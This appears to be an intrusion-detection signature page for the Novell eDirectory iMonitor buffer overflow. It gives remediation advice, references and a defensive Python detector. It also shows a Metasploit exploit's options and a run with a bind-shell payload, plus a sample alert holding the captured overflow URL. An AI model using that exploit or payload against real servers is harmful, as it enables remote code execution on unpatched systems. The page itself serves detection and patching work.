Novell eDirectory iMonitor buffer overflow (HTTP_Novell_iMonitor_BO)

About this signature or vulnerability

Proventia G-Series, Proventia Desktop, Proventia Network IPS, RealSecure Server Sensor, RealSecure Network Sensor, Proventia M-Series, BlackICE Agent for Server, BlackICE PC Protection, BlackICE Server Protection, Proventia Server for Windows:

This signature detects an attempt to overflow the Novell eDirectory Server iMonitor component by sending a specially crafted URL.

Default risk level


Sensors that have this signature

Proventia G-Series: XPU 24.38, Proventia Desktop: 8.0.812.1770, Proventia Network IPS: XPU 1.77, RealSecure Server Sensor: XPU 24.38, RealSecure Network Sensor: XPU 24.38, Proventia M-Series: XPU 1.77, BlackICE Agent for Server: 3.6epi, BlackICE PC Protection: 3.6cpi, BlackICE Server Protection: 3.6.cpi, Proventia Server for Windows: 1.0.914.1770

Systems affected

Windows NT: 4.0, Windows 2000: Any version, Novell eDirectory: 8.7.3, Windows 2003: Any version


Unauthorized Access Attempt

Vulnerability description

Novell eDirectory is a software package that uses a Lightweight Directory Access Protocol (LDAP) directory service for integrating enterprise and eBusiness programs. Novell eDirectory version 8.7.3, when running on Microsoft Windows, is vulnerable to a buffer overflow caused by improper bounds checking in the iMonitor component. A remote attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system with SYSTEM-level privileges, or possibly cause dhost.exe to crash.
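The signature fires on a crafted URL sent to the iMonitor HTTP listener, and the sample alert later on this page shows the traits an analyst can key on: destination port 8008, a request path under /nds/, and the "uses non-ASCII characters" evasion flag. The following is an added detection example written for this page; it is not ISS/X-Force or Novell code. The length threshold, the field names and the sample request lines are assumptions, and the sample records are constructed.

```python
"""Added example: flag oversized or non-ASCII /nds/ requests to the iMonitor port.

Not ISS/X-Force or Novell code. Port 8008 and the /nds/ prefix come from the
alert record on this page; MAX_NDS_PATH_LEN is an assumed threshold.
"""
import re
from typing import Optional
from urllib.parse import unquote_to_bytes

IMONITOR_PORT = 8008        # iMonitor port shown in the alert record
MAX_NDS_PATH_LEN = 256      # assumed threshold; tune to your own baseline

# HTTP request line: METHOD SP request-target SP HTTP-version
REQUEST_LINE = re.compile(rb"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")


def analyze_request(dst_port: int, request_line: bytes) -> Optional[dict]:
    """Return a finding for a suspicious iMonitor request, or None if benign."""
    if dst_port != IMONITOR_PORT:
        return None
    m = REQUEST_LINE.match(request_line.strip())
    if not m:
        return None
    path = m.group("target").split(b"?", 1)[0]     # drop any query string
    if not path.startswith(b"/nds/"):
        return None
    decoded = unquote_to_bytes(path)               # see through %XX-encoded high bytes
    reasons = []
    if len(decoded) > MAX_NDS_PATH_LEN:
        reasons.append(f"path length {len(decoded)} exceeds {MAX_NDS_PATH_LEN}")
    if any(b > 0x7E or b < 0x20 for b in decoded):
        reasons.append("path contains non-ASCII or control bytes")
    if not reasons:
        return None
    return {
        "tag": "HTTP_Novell_iMonitor_BO",
        "port": dst_port,
        "path_len": len(decoded),
        "reasons": reasons,
    }


# Constructed sample records: (destination port, raw request line)
SAMPLE_REQUESTS = [
    (8008, b"GET /nds/summary HTTP/1.1"),                  # ordinary iMonitor page
    (80,   b"GET /nds/" + b"A" * 600 + b" HTTP/1.1"),       # wrong port: not iMonitor
    (8008, b"GET /nds/" + b"A" * 600 + b" HTTP/1.1"),       # oversized path
    (8008, b"GET /nds/\xe4\xbd\x9e%fe%ff HTTP/1.0"),       # high bytes, raw and encoded
]


def scan(records):
    """Run analyze_request over (port, request line) pairs and keep the findings."""
    return [f for f in (analyze_request(p, line) for p, line in records) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

The check decodes percent-encoding before measuring, so an attacker-controlled path cannot hide high bytes behind %XX sequences; requests to other ports or outside /nds/ are ignored so that the rule stays scoped to the component the signature covers.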

How to remove this vulnerability

Apply the patch for this vulnerability listed in Novell Technical Information Document TID10098568. See References.

References

Secunia Security Advisory SA16393: Novell eDirectory iMonitor Buffer Overflow Vulnerability
Novell Technical Information Document TID10098568: Buffer overflow vulnerability against eDirectory 8.7.3 imonitor on Windows
Novell Technical Information Document TID2972038: eDirectory 8.7.3 iMonitor for Win32
CERT Vulnerability Note VU#213165: Novell eDirectory iMonitor vulnerable to buffer overflow
ISS X-Force: Novell eDirectory iMonitor buffer overflow

Metasploit module options (edirectory_imonitor)

Exploit:  Name    Default  Description
          ------  -------  -----------------------------------
optional  SSL              Use SSL
required  RHOST            The target address
optional  VHOST            The virtual host name of the server
required  RPORT   8008     The target port

Payload:  Name      Default  Description
          --------  -------  ------------------------------------------
required  EXITFUNC  thread   Exit technique: "process", "thread", "seh"
required  LPORT     4444     Listening port for bind shell

Target: Windows (ALL) - eDirectory 8.7.3 iMonitor

msf edirectory_imonitor(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit Windows (ALL) - eDirectory 8.7.3 iMonitor
[*] Overflow request sent, sleeping for four seconds
[*] Exiting Bind Handler.

msf edirectory_imonitor(win32_bind) >

Sample alert event
Date/Time 2006-06-18 22:26:11 JST
Tag Name HTTP_Novell_iMonitor_BO
Alert Name HTTP_Novell_iMonitor_BO
Severity High
Observance Type Intrusion Detection
Combined Event Count 1
Cleared Flag false
Target IP Address
Target Object Name 8008
Target Object Type Target Port
Source IP Address
SourcePort Name 1633
Sensor IP Address
Sensor Name network_sensor_1
:accessed yes
:evasions uses non-ASCII characters;
:intruder-port 1633
:URL /nds/佞7JBJ・A@GG@荘NJB屁C7J舛7FOFKKHJB傲・Fヨ@'@B櫑O廿GB澄FH'ヨHJI鋒FN桝廂G菅CB姆N妁訂僊O・@鎗@F・・GHON訪・泡OF滲GCO・・訂@C・蜂ヨGO・吏湧・ヨFNB7NF廿敦BK價鵰'ヨ趨K友僭7'@ヨ炉@O崇剞的BGB剞A・・CA只I'H'婁選'呂哲O銭・'O7N
:victim-port 8008
algorithm-id 2106212
IANAProtocolId 6
Packet DestinationAddress
Packet DestinationPort 8008
Packet DestinationPortName http-alt
Packet SourceAddress
Packet SourcePort 1633